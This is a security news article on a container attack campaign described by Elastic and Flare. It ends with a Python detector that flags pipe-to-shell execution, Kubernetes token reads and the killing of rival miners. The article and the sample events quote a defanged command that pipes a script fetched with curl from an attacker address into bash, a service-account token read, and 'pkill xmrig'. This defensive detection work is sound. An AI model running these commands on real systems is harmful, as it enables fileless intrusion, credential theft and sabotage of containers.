Container ransomware via one curl

Elastic Security Labs detailed a TeamPCP campaign that starts with a single curl command and achieves full code execution inside containers without writing files to disk. The report included runtime detection signals from Defend for Containers (D4C) across the attack chain, showing how runtime telemetry can reveal ephemeral, fileless container attacks. The demonstration highlights risks for Kubernetes workloads and the value of runtime signals integrated into classified environments. (x.com/elasticseclabs)

A container can be turned against its owner with one command: download a script with `curl`, pipe it into `bash`, and run code without ever saving a file. (elastic.co) Elastic Security Labs published that walkthrough on March 20, 2026, using a TeamPCP intrusion chain that starts with `curl -fsSL` fetching `proxy.sh` from `67.217.57[.]240:666` and executing it inside a container. (elastic.co) The point of the trick is simple: if nothing lands on disk, file scanners have less to inspect. Elastic said its Defend for Containers tool still sees the runtime pattern because `curl` immediately spawns a shell inside the container. (elastic.co) The process relationship is what a detection has to key on: in a pipe-to-shell chain the interpreter starts under the same parent as the downloader, with its standard input connected to the pipe, so a rule built on that parent, child and sibling pattern catches the execution whether or not a script file ever exists.

Containers are the packaged units that run many modern apps, and Kubernetes is the control system that schedules those packages across clusters of machines. Elastic’s example shows attackers using the first foothold to check whether the workload is running in Kubernetes and then moving toward persistence, lateral spread, and monetization. (elastic.co) Elastic’s March 19, 2026 documentation says Defend for Containers is deployed to Kubernetes clusters through Elastic Agent as a DaemonSet and uses extended Berkeley Packet Filter (eBPF) Linux Security Module (LSM) and tracepoint probes to record process, file, and network events. (elastic.co) That matters for attacks built to be brief and disposable. Elastic said the TeamPCP scenario leaves observable runtime behavior across execution, discovery, persistence, command-and-control, and impact even when the initial payload is fileless. (elastic.co)

The TeamPCP activity in Elastic’s write-up builds on Flare’s February 5, 2026 research, which said the group launched a broad campaign in December 2025 against exposed Docker application programming interfaces (APIs), Kubernetes clusters, Ray dashboards, Redis servers, and React2Shell-vulnerable apps. (flare.io) Flare said TeamPCP used those compromises to assemble proxy and scanning infrastructure, steal data, deploy ransomware, extort victims, and mine cryptocurrency. The firm said 97% of the compromised servers it tracked were in Microsoft Azure and Amazon Web Services: 61% in Azure and 36% in AWS. (flare.io)

Elastic’s container scenario also shows the group killing rival mining processes such as XMRig after gaining execution. Killing other processes is unusual in normal container workloads and becomes another runtime signal defenders can alert on. (elastic.co) The attack still starts with one short `curl` line, but the defenders’ view is no longer just the file that never appeared. It is the chain of processes, their parents, and the follow-on actions the command leaves behind in the running container. (elastic.co)
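The correlation described above, as an added example that is not Elastic's Defend for Containers logic and not anything from the TeamPCP tooling: a small Python detector that runs over a constructed stream of container process and file events and flags the three behaviours the article names, a shell started from a `curl` pipe, a read of the Kubernetes service-account token as a stand-in for the "am I in Kubernetes" check, and a kill of an XMRig process. The event schema, the token-path indicator, the rule names, the sample timestamps and pids, and the stage labels are all assumptions of this example.

```python
"""Correlate container runtime events into the curl-pipe-to-shell chain.

Added example, not Elastic's Defend for Containers logic. The event
schema (exec / file_open records with pid, ppid, comm, args, stdin) is an
assumption modelled loosely on what eBPF process and file probes emit.
"""
import re

DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "dash", "ash", "zsh"}
# Parent command line of the form "curl ... | bash" (also "wget ... | sh").
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|da|a|z)?sh\b")
# Assumed in-cluster discovery indicator: the mounted service-account token.
K8S_TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/token"
KILLERS = {"kill", "pkill", "killall"}
MINER_NAMES = re.compile(r"xmrig", re.I)  # extend with other miner names as needed

# Constructed sample telemetry for one container; pids and times are made up.
SAMPLE_EVENTS = [
    {"t": 1000, "type": "exec", "pid": 101, "ppid": 1, "comm": "sh",
     "args": ["sh", "-c", "curl -fsSL http://67.217.57[.]240:666/proxy.sh | bash"]},
    {"t": 1004, "type": "exec", "pid": 102, "ppid": 101, "comm": "curl",
     "args": ["curl", "-fsSL", "http://67.217.57[.]240:666/proxy.sh"]},
    {"t": 1005, "type": "exec", "pid": 103, "ppid": 101, "comm": "bash",
     "args": ["bash"], "stdin": "pipe"},
    {"t": 1180, "type": "file_open", "pid": 103, "path": K8S_TOKEN_PATH},
    {"t": 1400, "type": "exec", "pid": 104, "ppid": 103, "comm": "pkill",
     "args": ["pkill", "-9", "xmrig"]},
    # Benign: a liveness probe fetched with curl, no shell follows it.
    {"t": 5000, "type": "exec", "pid": 200, "ppid": 1, "comm": "curl",
     "args": ["curl", "-s", "http://127.0.0.1:8080/healthz"]},
]


def lineage(pid, parents):
    """Return [pid, ppid, grandparent, ...] until the parent is unknown."""
    chain = [pid]
    while pid in parents:
        pid = parents[pid]
        chain.append(pid)
    return chain


def detect(events, window_ms=500):
    """Apply the three rules to a time-ordered event list and return findings.

    Each finding carries the rule, an attack stage label (this example's own
    mapping), the pid, the timestamp, the process lineage and the evidence.
    """
    events = sorted(events, key=lambda e: e["t"])
    execs = [e for e in events if e["type"] == "exec"]
    parents = {e["pid"]: e["ppid"] for e in execs}
    cmdline = {e["pid"]: " ".join(e["args"]) for e in execs}
    findings = []

    def add(rule, stage, e, evidence):
        findings.append({"rule": rule, "stage": stage, "pid": e["pid"], "t": e["t"],
                         "lineage": lineage(e["pid"], parents), "evidence": evidence})

    for i, e in enumerate(events):
        if e["type"] == "exec" and e["comm"] in SHELLS:
            # Rule 1: interpreter started with a pipe on stdin shortly after a
            # sibling downloader exec, or under a parent running "curl ... | sh".
            sibling_download = any(
                p["type"] == "exec" and p["comm"] in DOWNLOADERS
                and p["ppid"] == e["ppid"] and 0 <= e["t"] - p["t"] <= window_ms
                for p in events[:i])
            parent_cmd = cmdline.get(e["ppid"], "")
            piped = e.get("stdin") == "pipe" and sibling_download
            if piped or PIPE_TO_SHELL_RE.search(parent_cmd):
                add("pipe_to_shell", "execution", e, parent_cmd or cmdline[e["pid"]])
        elif e["type"] == "file_open" and e["path"] == K8S_TOKEN_PATH:
            # Rule 2: reading the mounted token is a cheap "am I in Kubernetes" test.
            add("k8s_discovery", "discovery", e, e["path"])
        elif (e["type"] == "exec" and e["comm"] in KILLERS
              and MINER_NAMES.search(cmdline[e["pid"]])):
            # Rule 3: killing a rival miner; labelled "impact" here by assumption.
            add("miner_kill", "impact", e, cmdline[e["pid"]])
    return findings


def stages_hit(findings):
    """Distinct stage labels in order of first appearance."""
    seen = []
    for f in findings:
        if f["stage"] not in seen:
            seen.append(f["stage"])
    return seen


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['t']:>5} {f['rule']:<14} pid={f['pid']} "
              f"lineage={f['lineage']} {f['evidence']}")
    print("stages:", stages_hit(detect(SAMPLE_EVENTS)))
```

The benign `curl` against the health endpoint produces no finding because no shell follows it under the same parent, which is the distinction that keeps a pipe-to-shell rule from paging on every container that uses `curl` for probes. The lineage on each finding is what lets an analyst tie the token read and the `pkill` back to the shell that the pipe started.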
